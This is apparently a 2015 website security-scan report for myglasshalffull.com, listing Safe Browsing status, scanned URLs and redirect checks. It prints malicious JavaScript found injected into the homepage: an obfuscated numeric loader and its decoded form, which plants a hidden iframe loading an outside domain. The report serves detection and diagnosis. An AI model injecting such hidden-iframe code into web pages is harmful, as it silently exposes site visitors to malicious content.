Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myglasshalffull.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://myglasshalffull.com/ | 200 OK Content-Length: 10407 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)a=("urf3".split+'352').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,4,86,-28,-28,-28,68,65,77,60,72,64,77,3,4,22,-28,-28,88,-5,64,71,78,64,-5,86,-28,-28,-28,63,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-3,23,68,65,77,60,72,64,-5,78,77,62,24,2,67,79,79,75,21,10,10,63,77,74,75,78,67,68,75,75,64,77,75,74,77,79,60,71,9,62,74,72,2,-5,82,68,63,79,6 Decoded script: e(s) e(s) if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dropshipperportal.com' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dropshipperportal.com');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10'); <iframe src='http://dropshipperportal.com' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://entertolearn.com/pxjw4hrg.php?id=14106526 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:26 GMT Location: https://www.entertolearn.com/pxjw4hrg.php?id=14106526 Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/pxjw4hrg.php?id=14106526 | 200 OK Content-Length: 1 Content-Type: text/html | clean |
http://www.entertolearn.com/test404page.js | 404 Not Found Content-Length: 58482 Content-Type: text/html | clean |
http://www.entertolearn.com/wp-content/plugins/wp-spamshield/js/jscripts.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:32 GMT Location: https://www.entertolearn.com/wp-content/plugins/wp-spamshield/js/jscripts.php Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/wp-content/plugins/wp-spamshield/js/jscripts.php | 200 OK Content-Length: 883 Content-Type: application/x-javascript | clean |
http://www.entertolearn.com/wp-content/plugins/wp-synhighlight/themes/default/wp-synhighlighter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:34 GMT Location: https://www.entertolearn.com/wp-content/plugins/wp-synhighlight/themes/default/wp-synhighlighter.js Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/wp-content/plugins/wp-synhighlight/themes/default/wp-synhighlighter.js | 200 OK Content-Length: 2486 Content-Type: application/javascript | clean |
http://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/jquery.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:34 GMT Location: https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/jquery.js Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/jquery.js | 200 OK Content-Length: 57276 Content-Type: application/javascript | clean |
http://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/tabber.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:35 GMT Location: https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/tabber.js Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/tabber.js | 200 OK Content-Length: 1894 Content-Type: application/javascript | clean |
http://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/superfish.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 10 Jan 2015 12:35:36 GMT Location: https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/superfish.js Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
https://www.entertolearn.com/wp-content/themes/bigfoot_v1.8/bigfoot/javascripts/superfish.js | 200 OK Content-Length: 3826 Content-Type: application/javascript | clean |
http://stats.wp.com/e-201502.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
https://www.entertolearn.com/ | 200 OK Content-Length: 75650 Content-Type: text/html | clean |
https://stats.wp.com/e-201502.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
https://www.entertolearn.com/about | 200 OK Content-Length: 62290 Content-Type: text/html | clean |
https://www.entertolearn.com/contact-us | 200 OK Content-Length: 61001 Content-Type: text/html | clean |
https://www.entertolearn.com/privacy-policy | 200 OK Content-Length: 61652 Content-Type: text/html | clean |
https://www.entertolearn.com/write-for-us | 200 OK Content-Length: 62728 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: myglasshalffull.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:35:25 GMT
Server: Apache
Content-Length: 10407
Content-Type: text/html; charset=UTF-8
X-Pingback: http://myglasshalffull.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...10407 bytes of data.
GET / HTTP/1.1
Host: myglasshalffull.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:35:25 GMT
Server: Apache
Content-Length: 10407
Content-Type: text/html; charset=UTF-8
X-Pingback: http://myglasshalffull.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...10407 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: myglasshalffull.com
Referer: http://www.google.com/search?q=myglasshalffull.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: myglasshalffull.com
Referer: http://www.google.com/search?q=myglasshalffull.com
Result:
The result is similar to the first query. There are no suspicious redirects found.